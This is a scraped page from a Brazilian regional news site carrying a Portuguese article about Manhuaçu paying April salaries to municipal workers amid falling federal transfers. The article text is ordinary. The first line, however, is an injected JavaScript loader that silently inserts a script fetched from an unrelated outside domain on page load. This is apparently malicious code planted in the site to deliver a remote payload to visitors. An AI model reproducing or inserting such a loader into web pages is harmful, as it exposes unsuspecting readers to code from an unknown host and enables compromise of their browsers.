;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu - Servidores recebem pagamento referente ao mês de abril. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu – Servidores recebem pagamento referente ao mês de abril.

DSC_1512O Governo de Manhuaçu realiza nesta sexta-feira, 29, o pagamento do salário referente a este mês de abril, para todos os 2.938 servidores municipais. O número inclui os 143 funcionários do SAAE e 240 trabalhadores do SAMAL, as duas autarquias que atuam nos serviços de água e esgoto e de limpeza urbana e ainda aposentados e pensionistas.

A ação de pagamento, sempre dentro do mês trabalhado, é um compromisso assumido pela atual administração desde o primeiro dia de governo. No total, segundo dados da Secretaria de Fazenda, estão sendo pagos aos servidores quase R$ 5,8 milhões, incluindo os encargos trabalhistas, para quitar a folha de pagamento. O dinheiro entra em circulação no comércio local e faz movimentar todos os setores da economia na cidade.

A iniciativa, além de demonstrar o respeito a todos os servidores municipais, é importante também para manter ativa a economia no município, fazendo circular o dinheiro e o movimento em toda a cadeia produtiva, segundo a administração de Manhuaçu.

Apesar de efetuar o pagamento em dia, o município vem sofrendo com as quedas constantes na arrecadação, principalmente nos repasses feitos pelo Governo Federal. Como as despesas para manutenção dos serviços básicos não diminuem, o município já atingiu o limite prudencial, previsto na Lei de Responsabilidade Fiscal, de comprometer até 54% da receita com a folha de pagamento dos servidores.

A situação vem impossibilitando reajustes salariais para os servidores, a exemplo do que ocorreu em outros anos. Em 2013, 2014 e 2015 o Governo de Manhuaçu concedeu reajustes nos salários dos trabalhadores bem acima da inflação. Neste ano, no entanto, a queda na receita impede qualquer tipo de reajuste.

PROBLEMA GERAL

A situação de Manhuaçu é a mesma enfrentada por municípios vizinhos. O problema ficou bem claro durante reuniões em Carangola dos Consórcios Intermunicipais dos quais Manhuaçu integra, o CISAB (Saneamento Básico) e CISVERDE (Saúde).

O prefeito de Espera Feliz, João Carlos Cabral de Almeida, afirmou que o município não é diferente dos demais. “Todos estão com aperto financeiro e a gente tem procurado trabalhar da melhor forma possível, mas o momento é muito difícil” – comentou. “Há cada dia que passa há mais cortes do Governo Federal, mas a gente espera superar isso aí e concluir o 2016”, completou João Carlos.

O prefeito de Alto Jequitibá e presidente do CIS-VERDE, Daniel Guimarães Sather, lembrou que as despesas nos municípios subiram muito com combustíveis, energia, manutenção de veículos, salário mínimo, entre outros, enquanto a arrecadação só vem caindo. “O FPM por exemplo que nós estamos recebendo neste ano de 2016 está menor do que o que nós recebíamos em 2014” – destacou.

“São mais de 5.500 municípios no país que estão enfrentando essas dificuldades. É uma crise nacional, a população está ganhando menos, mais de 10 milhões de desempregados, então isso reflete diretamente nos municípios e não estamos tendo a recomposição dos valores para manter o mesmo padrão de qualidade dos serviços essenciais” – completou Daniel Guimarães.

Em Ipatinga, no Vale do Aço, cidade industrial com mais de duzentos mil habitantes, somente na última semana, quarta-feira, 20, a prefeitura iniciou o pagamento do 13º salário de 2015 aos servidores que ocorre de forma escalonada. No município cerca de 1,2 mil servidores receberão o 13º de 2015 parcelado em cinco vezes.

Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.